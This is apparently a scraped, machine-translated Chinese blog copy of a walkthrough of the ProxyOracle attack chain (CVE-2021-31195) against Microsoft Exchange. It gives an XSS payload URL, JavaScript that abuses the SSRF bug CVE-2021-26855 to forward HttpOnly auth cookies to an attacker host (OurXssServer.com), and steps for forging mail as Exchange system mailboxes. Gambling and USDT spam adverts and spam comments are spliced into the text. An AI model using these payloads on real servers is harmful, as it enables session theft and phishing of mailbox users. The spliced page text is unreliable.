首页 科技内容详情
【手艺原创】ProxyOracle行使剖析1——CVE-2021-31195

【手艺原创】ProxyOracle行使剖析1——CVE-2021-31195

分类:科技

网址:

反馈错误: 联络客服

点击直达

2022世界杯预选赛赛程欧洲www.9cx.net)实时更新比分2022世界杯预选赛赛程欧洲数据,2022世界杯预选赛赛程欧洲全程高清免费不卡顿,100%原生直播,2022世界杯预选赛赛程欧洲这里都有。给你一个完美的观赛体验。

0x00 前言

我和Evi1cg一起复现了ProxyOracle攻击链,本文仅在手艺研究的角度纪录研究ProxyOracle中的细节,剖析行使思绪。

0x01 简介

本文将要先容以下内容:

◼XSS复现

◼HttpOnly绕过

◼XSS平台搭建

◼伪造邮件

0x02 XSS复现

测试环境:

◼Exchange Server IP: 192.168.1.1

用户登录后接见如下链接:

https://192.168.1.1/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};alert(document.cookie)//

触发XSS,如下图


然则这里无法显示我们想要的Cookie数据,详细名称如下:

◼cadata

◼cadataTTL

◼cadataKey

◼cadataIV

◼cadataSig

查看以上Cookie的HttpOnly属性,如下图


可以看到以上Cookie设置了HttpOnly属性,可用来防止XSS攻击,通过js剧本将无法读取到Cookie信息。

0x03 HttpOnly绕过

为了能够读取受HttpOnly属性珍爱的Cookie信息,我们需要借助SSRF破绽,控制Exchange服务器将Cookie信息发送至我们自己搭建的XSS平台。

这里需要注重以下细节:

1.SSRF破绽的选择

(1)CVE-2021-26855

能够接见外部XSS平台

能够使用ajax模拟用户发包触发SSRF破绽

(2)CVE-2021-28480

能够接见外部XSS平台

无法使用ajax模拟用户发包触发SSRF破绽(无法修改Cookie中的X-BackEndCookie)

(3)CVE-2021-34473

无法接见外部XSS平台

因此,最终的选择为CVE-2021-26855

2.XSS平台搭建

环球国际娱乐网址多少www.ugbet.us)开放环球UG代理登录网址、会员登录网址、环球UG会员注册、环球UG代理开户申请、环球UG电脑客户端、环球UG手机版下载等业务。

由于我们借助了SSRF破绽,控制Exchange服务器将Cookie信息发送至XSS平台,导致我们最终想要的Cookie信息位于Request Headers中

而现有的XSS平台多数是通过POST请求的参数来转达数据

为领会决这个问题,这里可以选择我之前开源的XSS平台,地址如下:

https://github.com/3gstudent/pyXSSPlatform

只需要修改以下位置:

◼修改index.js,使用ajax模拟用户发包触发SSRF破绽

◼修改pyXSSPlatform.py,将GET请求的Request Headers举行提取

◼使用正当的证书

index.js代码示例:

var xmlHttp = new XMLHttpRequest();
xmlhttp.open("GET", "https://192.168.1.1/owa/auth/x.js", false);
document.cookie = "X-AnonResource=true";
document.cookie = "X-AnonResource-Backend=OurXssServer.com/,~1";
xmlhttp.send();

3.XSS行使代码

控制用户接见XSS平台的代码示例:

https://192.168.1.1/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\&refurl=}}};document.head.appendChild(document.createElement(/script/.source)).src=/https:\/\/OurXssServer.com\/index.js/.source//

0x04 伪造邮件

1.伪造成Exchange的默认用户

在之前的文章《ProxyShell行使剖析1——CVE-2021-34473》中提到:通过CVE-2021-34473,我们可以模拟成随便用户身份举行EWS挪用操作。

而且,Exchange中默认存在以下四个用户可供使用:

◼SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}

◼SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}

◼SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}(Exchange 2016 CU8 and later)

◼SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}(Exchange 2016 CU8 and later)

连系以上信息,我们可以模拟成Exchange的默认用户来发送邮件,对应名称如下:

◼SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}:Microsoft Exchange

◼SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}:Microsoft Exchange

◼SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}(Exchange 2016 CU8 and later):E4E Encryption Store - Active

◼SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}(Exchange 2016 CU8 and later):Microsoft Exchange

2.通过EWS发送超链接

花样参考:

https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/createitem-operation-email-message

然则我没有找到通过EWS发送超链接的花样。

这里我是通过抓包的方式获得了准确的SOAP花样,方式可参考之前的文章《渗透基础——通过Outlook Web Access(OWA)读取Exchange邮件的下令行实现》。

需要注重以下部门:

◼使用CreateItem发送邮件

◼SendOnly示意只发送邮件,不保留

◼BodyType需要设置为HTML

◼正文内容需要注重XML的转义字符

Python示例代码如下:


0x05 小结

对于CVE-2021-31195,不仅可以用来获得用户的Cookie信息,同样可以使用其他XSS的行使方式,例如截取屏幕和模拟用户发包修改收件箱接见权限。


澳洲幸运5官网www.a55555.net)是澳洲幸运5彩票官方网站,
开放澳洲幸运5彩票会员开户、澳洲幸运5彩票代理开户、
澳洲幸运5彩票线上投注、澳洲幸运5实时开奖服务的平台。

06.gif 【手艺原创】ProxyOracle行使剖析1——CVE-2021-31195 第1张

  • 澳5彩票开户(a55555.net) @回复Ta

    2021-10-10 00:04:40 

    欢迎进入欧博亚洲手机版下载(www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务(wu)。在家宅着,很精彩

  • usdt手续费怎么收(www.usdt8.vip) @回复Ta

    2021-10-11 00:10:51 

    USDT线下交易www.Uotc.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U担保开放usdt otc API接口、支付回调等接口。

    我感觉融为一体了

  • 新2会员手机管理端(www.22223388.com) @回复Ta

    2021-10-27 00:04:34 

    usdt官网www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

    作者很有前途啊

发布评论